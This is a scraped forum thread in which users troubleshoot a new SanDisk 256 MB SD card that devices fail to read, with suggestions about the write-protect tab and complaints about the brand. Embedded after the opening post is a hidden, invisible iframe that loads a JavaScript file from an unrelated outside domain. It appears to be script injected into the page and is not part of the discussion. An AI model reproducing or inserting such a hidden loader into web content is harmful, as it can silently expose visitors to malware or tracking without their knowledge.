+ Reply to Thread

received a defective SD card, or so it seems

Hi, I just received a SanDisk 256mb SD card. Phone says card cannot be recognized (and yes, I put it in right-side up! I read about this in the other postings about SD cards that fail to mount, and it seems hard to even physically get the thing in upside down without a fair bit of force).

I also have a little USB combo flash/SD reader, and when I put the SD card in there, the light just kind of flickers faintly, and the computer doesn't see the card either.

I'm guessing this is a defective card, and will send it back for a new one.
    But if anybody knows any tricks I'm overlooking, I'd appreciate the advice.

Thanks<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Write Protected?

Is it possible that the little plastic write protect switch on the card is set so that you can take a completely new card stick it in a device and not have it format because it can't write to it? That's one thing I would look at before sending it back.

Re: Write Protected?

Originally posted by Tony BOD
    Is it possible that the little plastic write protect switch on the card is set so that you can take a completely new card stick it in a device and not have it format because it can't write to it? That's one thing I would look at before sending it back.
    good idea, but i played with the write-protect tab, and it seems to be working and not in the locked position, so i don't think that's it. thanks anyhow, though.

A little off topic:

How large of an SD should you get? I am just looking for a place to stash photos and give my 7135 a little room!

I am thinking a 128 size.

js

Zolot, sounds like a bad card.

Shucks - For a few extra you can get a 256 (49 after rebate at ecost (Lexar))
    Walt

I've had nothing but problems with SanDisk cards and even some of their readers. I had to return a 256 MB SanDisk SD card last week because it couldn't be read in a standard card reader. This is the 2nd time this has occured.

Dawn

I ordered a Cruzer with 256 MB SD card from Amazon. I had the same problem - PC kept telling me the card was write protected, yeah right! Sent it back at the recommendation of Sandisk. I purchased a Lexar card and PNY card reader. Works perfect! No more Sandisk for me.

I've been using my Cruzer and 256Meg Sandisk SD card(s) (I have two of them) for several months now. I also have other Sandisk CF cards, and have never had any problems with them, other than the fact that they are slower than some of the other brands of flash memory cards I have, transfer rate-wise.

St

I just received my Cruzer w/256 SD card and no problems. I also have a 256 CF Sandisk that hasn't given me any problems. Knock on silicon.